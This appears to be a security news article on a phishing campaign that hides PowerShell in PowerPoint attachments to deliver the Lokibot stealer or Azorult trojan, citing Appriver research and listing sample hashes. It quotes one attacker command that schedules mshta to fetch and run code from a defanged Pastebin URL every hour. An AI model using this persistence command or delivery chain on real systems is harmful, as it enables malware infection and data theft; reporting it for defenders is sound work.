A new malware campaign utilizes PowerPoint files to deliver the Lokibot info stealer or Azorult remote access trojan.
Security researchers from Appriver spotted the malware campaign that includes weaponized PowerPoint files.
PowerPoint Malware Infection Chain
The infection starts with a simple Email that has PowerPoint Files attached. To device victims, the weaponized PowerPoint files contain lyrics of popular Drake song hidden inside a PowerShell command.
Once the PowerPoint attachments opened, it runs heavily obfuscated visual basic script, the script utilizes Mshta.exe utility that executes Microsoft HTML Applications (HTA) for reaching a bitly shortened link.
Then it checks whether the Excel or Word is running, if they are running then it kills the process. Later it creates a scheduled task using Mshta.exe to check for Pastebin URL every 60 minutes.
“C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 60 /tn (+main+) /tr “mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr” /F
The Pastebin URL contains the encoded script of the samples, based on the victim’s the encodes script decides to download the Lokibot info stealer or Azorult remote access trojan.
“Once decoded, this translates into a PowerShell script that contains a reference to Drake’s “Keke Do You Love Me” lyrics. This attacker “Master X”, retrieved from the metadata inside the PowerPoint, had a sense of humor when he was creating the invoke-expression cmdlet,” reads Appriver blog post.
Master X also obfuscates the download string as a method to get undetected by security monitoring tools. Here are the malware functions:
Lokibot – It is an information stealer malware, generally delivered through spam emails, capable of collecting information from a range of applications.
Azorult – First spotted in 2016, a trojan malware that harvests and exfiltrates data from the compromised system.
Indicators of Compromise
Lokibot Sample sha256 80c10ee5f21f92f89cbc293a59d2fd4c01c7958aacad15642558db700943fa22 Azorult Sample sha256 a3c8f58fd18e564ec11c247aede37b0be763d1fca46d0cbe5d032cf17e3a6bf3